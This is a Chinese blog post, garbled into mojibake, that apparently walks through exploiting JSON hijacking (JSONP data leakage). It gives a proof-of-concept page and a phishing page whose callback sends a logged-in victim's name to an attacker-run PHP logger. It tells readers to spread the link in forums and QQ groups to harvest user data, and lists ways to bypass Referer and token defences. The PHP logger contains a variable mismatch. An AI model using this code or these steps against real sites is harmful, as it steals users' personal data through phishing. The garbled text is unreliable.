溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用

發(fā)布時(shí)間:2021-12-14 09:09:57 來(lái)源:億速云 閱讀:121 作者:柒染 欄目:網(wǎng)絡(luò)管理

這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

前言

JSON Hijacking漏洞的詳細(xì)利用,有點(diǎn)類似與CSRF,不過(guò)原理利用方式不同,在這邊文章我著重講解json跨域劫持的利用環(huán)境搭建與方式。

0×01漏洞的挖掘

一般挖掘的過(guò)程中,burpsuite代理的History做尋找,過(guò)濾多余不可能存在漏洞的一些鏈接,如下圖所示:

如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用

我們?cè)诜祷匕衘son格式發(fā)現(xiàn)了如下的敏感信息(用戶Id,用戶名,用戶手機(jī)號(hào)碼)。

如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用

0×02漏洞的證明之poc

提交漏洞,poc在眾測(cè)時(shí)要爭(zhēng)分奪秒,所以這邊用了最精簡(jiǎn)的一個(gè)POC。

假如返回的數(shù)據(jù)為:

txf({"data":{"name":"唐曉峰"}});    

<html>
<head>
<script>
function txf(a){
alert(a.data.name);
}
</script>

<script src=http://***.***.**/wm/User/getUserInfo?callback=txf></script>
</body>
</html>

即可如下彈窗:

如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用

0×03漏洞的利用之釣魚

1.準(zhǔn)備一臺(tái)web服務(wù)器,我直接phpstudy搭的。

附上服務(wù)器端的代碼

json.php
<?php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "名字:  ".$name."\r\n");
?><html>
釣魚.html
<head>
   <title>txf</title>
<script>
var xmlhttp;
   function txf(a)
   {
   xmlhttp=new XMLHttpRequest()
var x="http://***.***.***/json.php?name="+a.data.name;
xmlhttp.open("GET", x, true);
xmlhttp.send();
}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
<body>
<textarea>釣魚啦,傻瓜</textarea>>
</body>
</html>

把釣魚鏈接http://***.***.***/釣魚.html發(fā)給該網(wǎng)站已登陸的用戶,如論壇,社區(qū)QQ群,社區(qū)貼吧等,服務(wù)端即可獲取到大量用戶敏感數(shù)據(jù)。

這邊以hackone的一個(gè)項(xiàng)目為例:    

如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用

0×04漏洞的修復(fù)與繞過(guò)

因?yàn)檫@個(gè)例子是小伙伴發(fā)過(guò)來(lái)的還沒(méi)修復(fù),所以都脫敏了,我們?cè)購(gòu)拈_(kāi)發(fā)修復(fù)的角度去思考如何繞過(guò)修復(fù)。

1.Referer白名單

子域名繞過(guò),文件名繞過(guò),空Referer繞過(guò)

2.增加token認(rèn)證

token足夠復(fù)雜或者服務(wù)端加密,我們無(wú)法繞過(guò),如果token很簡(jiǎn)單,如純數(shù)字,我們可以嘗試遍歷繞過(guò)

3.接口禁用

無(wú)敵的操作,無(wú)法繞過(guò)

關(guān)于如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI